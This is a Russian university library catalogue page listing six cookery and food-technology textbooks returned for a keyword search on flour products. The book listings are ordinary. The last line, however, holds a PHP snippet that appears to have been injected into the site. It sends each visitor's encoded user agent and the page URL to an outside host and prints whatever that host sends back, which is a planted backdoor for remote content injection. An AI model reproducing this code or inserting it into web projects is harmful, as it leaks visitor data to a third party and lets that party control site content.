Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

164 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=МУЧНОЕ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 6
1. 
Кухни народов мира [Текст] / сост. М. В. Набережная, 2006. - 671 с.
Держатели документа (Информация об экземплярах) 
2. 
Кузнецова, Людмила Семеновна. Технология и организация производства кондитерских изделий [Текст] / Л. С. Кузнецова, М. Ю. Сиданова, 2009. - 478, [1] с.
Держатели документа (Информация об экземплярах) 

Рассмотрена технология переработки пищевого сырья в сахарные и мучные кондитерские изделия. Приведены требования к качеству сырья при его закупке, хранении и подготовке к первичной переработке, химический состав и свойства сырья и сведения о его подверженности изменениям под влиянием теплового, механического и других видов воздействия. Изложены методика составления рецептур кондитерских изделий и требования к качеству готовой продукции и ее хранению.

Во 2-е издание внесены исправления и дополнения, связанные с введением в действие новых ГОСТов на пищевые продукты по состоянию на 1 января 2009 г.

Для студентов средних профессиональных учебных заведений. Может быть полезен студентам вузов и специалистам кондитерского производства.

3. 
Кухни народов мира [Текст] / сост. М. В. Набережная, 2005. - 671 с.
Держатели документа (Информация об экземплярах) 
4. 
Контроль качества сырья и готовой продукции на предприятиях общественного питания [Текст] / О. В. Бредихина [и др.], 2014. - 191 с.
Держатели документа (Информация об экземплярах) 

В настоящем учебном пособии изложены основные понятия о качестве продукции и организации контроля продукции на предприятиях общественного питания. Приведены методы контроля качества и безопасности сырья, полуфабрикатов и готовой продукции, используемых для сырья животного и растительного происхождения. Описаны основные требования к мясу и мясопродуктам, отличительные особенности и правила оценки качества и безопасности. Представлены сведения по мясу, птице и яйцам. Приведены требования к рыбному сырью и нерыбным объектам промысла, а также к готовой продукции из данного сырья. Описаны требования по качественным характеристикам мучных и кондитерских изделий, сырья, полуфабрикатов и готовых изделий. В приложении приводятся основные документы, регламентирующие показатели качества в общественном питании.

Предназначено для бакалавров обучающихся по направлению 260800 «Тех-нология продукции и организация общественного питания».

5. 
Могильный М. П. Технология продукции общественного питания [Текст] / М. П. Могильный, Т. Ш. Шалтумаев, Т. В. Шленская, 2013. - 430 с.

В учебном пособии рассмотрена нормативная, техническая и технологическая документация, действующая в общественном питании; научные основы технологических процессов производства продукции общественного питания; технологические процессы обработки сырья, полуфабрикатов и готовой продукции; оценка качества продукции; современные подходы к разработке и производству продукции общественного питания. Особое внимание уделено технологическим характеристикам продукции, процессам, протекающим в продуктах при производстве, их влиянию на конечное качество. В приложении имеются извлечения из ГОСТов, СанПиН, а также указаны особенности организации питания зарубежных гостей.

Учебное пособие предназначено для студентов высших учебных заведений, обучающихся по направлению бакалавров "Технология продукции и организация общественного питания", специалистов, практических работников, слушателей системы повышения квалификации общественного питания, аспирантов, магистров.

6. 
Сборник рецептур блюд и кулинарных изделий [Текст] : Норматив. док. для предприятий обществ. питания / А. В. Румянцев, 1998. - 863 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2998 - 25.08.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.75 с.12 запросов, 0.51c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;